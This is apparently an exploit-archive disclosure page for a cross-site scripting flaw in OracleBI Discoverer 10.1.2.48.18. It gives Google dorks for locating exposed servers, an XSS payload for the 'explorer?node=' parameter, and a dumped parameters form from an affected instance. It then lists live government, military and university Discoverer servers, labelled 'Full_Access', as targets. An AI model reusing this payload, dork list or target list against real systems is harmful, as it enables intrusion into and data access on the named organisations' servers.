OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

2012.12.13

Credit: Ur0b0r0x

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:discoverer/viewer? OR inurl:/discoverer/app/connection

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat
# Home: ur0b0r0x.blogspot.com
# Exploit Title: OracleBI Discoverer Ver 10.1.2.48.18 - Full Acces Data Base - Cross Site Scripting
# dork1:inurl:discoverer/viewer?
# dork2:inurl:/discoverer/app/connection
# dork3:inurl:/discoverer/app/econnection
# dork4:inurl:/discoverer/app/
# dork5:inurl:/discoverer/app/explorer"
# Date: 12/12/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html
# Vendor Name: Oracle
# Tested On: Backtrack R3 / Linux Mint
# Type: php
------------------- Agreement --------------------
[08/12/2012] - Vulnerability discovered
[11/12/2012] - Vendor notified Dont responsed
[12/12/2012] - Public disclosure
--------------------------------------------------
#Proof Concept
http://ur0b0r0x.blogspot.com/
#Code/Xss/Path
explorer?node="><img src="x" onerror="alert('XSS')" />
#Code/Active contracts by Opdiv,office code,completion date - Active Contracts
<form action="/discoverer/app/parameters" method="POST" style="margin:0px" name="parametersForm" id="parametersForm"><span id="params"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="x0">Select values for the following parameters.</span></td></tr><tr><td><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="xc">*</span><img width="4" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td><span class="x2o">Indicates required field</span></td></tr></tbody></table></td></tr><tr><td><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td><table width="100%" cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_12">Please select the contract status IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'A'" size="30" name="_12" onkeypress="return _submitOnEnter(event, 'parametersForm');" class="x4" id="_12"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_12', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_12(lovwin){ _setFieldValue(document.parametersForm,"_12",lovwin.top.myDataValue);return false;}</script></td><td><script src="/discoverer/cabo/jsLibs/BIParametersLOV.js" language="javascript"></script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select the contract status IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_14">Please select Office Code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'00102'" size="30" name="_14" class="x4" id="_14"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_14', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_14(lovwin){ _setFieldValue(document.parametersForm,"_14",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select Office Code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_16">Please select Completion Date prior to</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><input type="text" value="'01-JUN-2007'" size="30" name="_16" class="x4" id="_16"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Date Format 'DD-MON-YYYY' (Example: 12-DEC-2012)</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_18">Please select component code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'IHS'" size="30" name="_18" class="x4" id="_18"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_18', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_18(lovwin){ _setFieldValue(document.parametersForm,"_18",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select component code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr></tbody></table></td></tr></tbody></table><script language="javascript">function paramsbi_selectParams() {var f=document.parametersForm;submitForm('parametersForm',1,{event:'bi_selectParams',source:'params',bi_cPath:'params'});}</script><input type="hidden" name="bi_viewNames" value="params"></span><span id="paramsscriptId"></span><a onclick="paramsbi_selectParams();" accesskey="o" href="#"><img width="35" height="18" border="0" align="middle" alt="Go" title="Go" src="/discoverer/cabo/images/cache/en/bGoGl9n.gif"></a><input type="hidden" name="stateStr" value="eNqNU11v2jAU/TMh2mS1ssNH24c8IGDapg0mtX2OHNspAScOtokDv37XCaURtN0eyLUv5577ca4DtzVrGwyiEa8TbsAOoslOmqQZRORhMJzPc8NULbTQD/ntk7JUopnal7YHG13CZqqoVClKC1AuAGmNSYCb4Evks7R5Qa1APkQKm6sSzeE$iGZyDZ9S6YJKOGRUGs$0q5KZKq2mzCJjqd0b9IdqWggrNAF2$E2zLPNm2q$RXGZeaS40Wu4LtHwBHFUOEOcsp6i79wcwdVRzH6R3/aAqWWVZzkTb9btljcFgTHDUL214VdobS0d7nhJ7mxL3d6t6LXuLyc3P5$VNhPFdP8X9ZYq5kpJqg1apzF$AiffAkys591p3Yl5oNMkKwDYFCDQxxsDZ6n1/fuP/1/u8I$R6m056v4r12Wq8Lh77SAKY9vTH98f$dPA/M56h0YfQx3YZAcq5gT/bhP5RwafZ3pBCIvAa6PfoyC12aHtoeI1SenRwYeboorE7NBVDNQDc5tBseH2AYAfSjE4tjiRrHyjQ2vRTYpsemjQ30nrD1sqztqQn56aFAEXlR2TW3cMfudofCMFd7a07YGUQ1szGpuYhK7cxyxIKiIBWgW83g1bBys6YzpSss9y7A9FUMghNFYclyBKTUNSgUQxuWvLQP2MRf7kffg21UjbGoUttHAWVznmw$LX4vVg$wSZF3wgOmD1UQZ0LJ/RfFGiQmw=="><span id="_parametersForm_Postscript"><input type="hidden" name="source"><input type="hidden" name="event"><input type="hidden" name="bi_lovID"><input type="hidden" name="partial"><input type="hidden" name="partialTargets"><input type="hidden" name="bi_cPath"><script>var _resetparametersFormNames=["source","event","bi_lovID","partial","partialTargets","bi_cPath"];</script><script>var _parametersForm_Validations=['_isEmpty(%value%)'];function _parametersFormValidater(form){var fl = _multiValidate(form,[0,"_12",0,0,0,"_14",0,0,0,"_16",0,0,0,"_18",0,0]);if(fl.length&gt;0){_validationAlert('Form validation failures:'+fl);return false;}else{return true;}}var _parametersForm_Labels={'_12':'Please select the contract status IN','_14':'Please select Office Code IN','_16':'Please select Completion Date prior to','_18':'Please select component code IN'};var _parametersForm_Formats=['A value must be entered for "%label%".'];function _submitOnEnter(e,frm){return (_getKC(e)!=13);}</script></span><script>_submitFormCheck();</script></form>
Sample/Demo/Full_Access/
http://dcis04.psc.gov/discoverer/app/econnection
http://abac.upf.edu/discoverer/app/econnection
http://mytest.sfwmd.gov/discoverer/app/econnection
http://demoa.ocu.es/discoverer/app/econnection
http://www.paaf.gov.kw/discoverer/viewer
http://www.qix.gov.qa/discoverer/app/econnection
http://discoverer.banrep.gov.co/discoverer/app/econnection
http://statistik.forsakringskassan.se/discoverer/app/econnection
https://oasext.epa.gov/discoverer/app/econnection
http://www.reeis.usda.gov/discoverer/app/connection
http://cbi.superfinanciera.gov.co/discoverer/app/econnection
http://mytest.sfwmd.gov/discoverer/app/econnection
http://owl.cuny.edu:7778/discoverer/app/econnection
http://oaspruebas.policia.gov.co:7778/discoverer/app/connection?event=displayConnections
http://siadapp.dmdc.osd.mil/discoverer/viewer
http://xportalt.sfwmd.gov/discoverer/app/connection
http://siadapp.dmdc.osd.mil/discoverer/viewer
http://www.cdr.isa.org.jm/discoverer/app/econnection
http://suamox03.dane.gov.co:7778/discoverer/app/econnection
http://iaorap1.mincetur.gob.pe:7778/discoverer/viewer
http://discoverer.dnr.state.la.us/discoverer/app/connection
http://www.moi.go.th/discoverer/app/econnection
http://www.reeis.usda.gov/discoverer/app/econnection
http://www.st.nmfs.noaa.gov/discoverer/app/connection
http://portal.nysed.gov/discoverer/app/connection
http://190.242.99.238/discoverer/app/econnection

References:

http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

Dork: inurl:discoverer/viewer? OR inurl:/discoverer/app/connection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.